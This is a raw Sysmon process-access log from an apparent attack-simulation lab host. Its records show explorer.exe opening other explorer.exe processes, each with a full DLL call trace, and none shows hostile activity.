22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 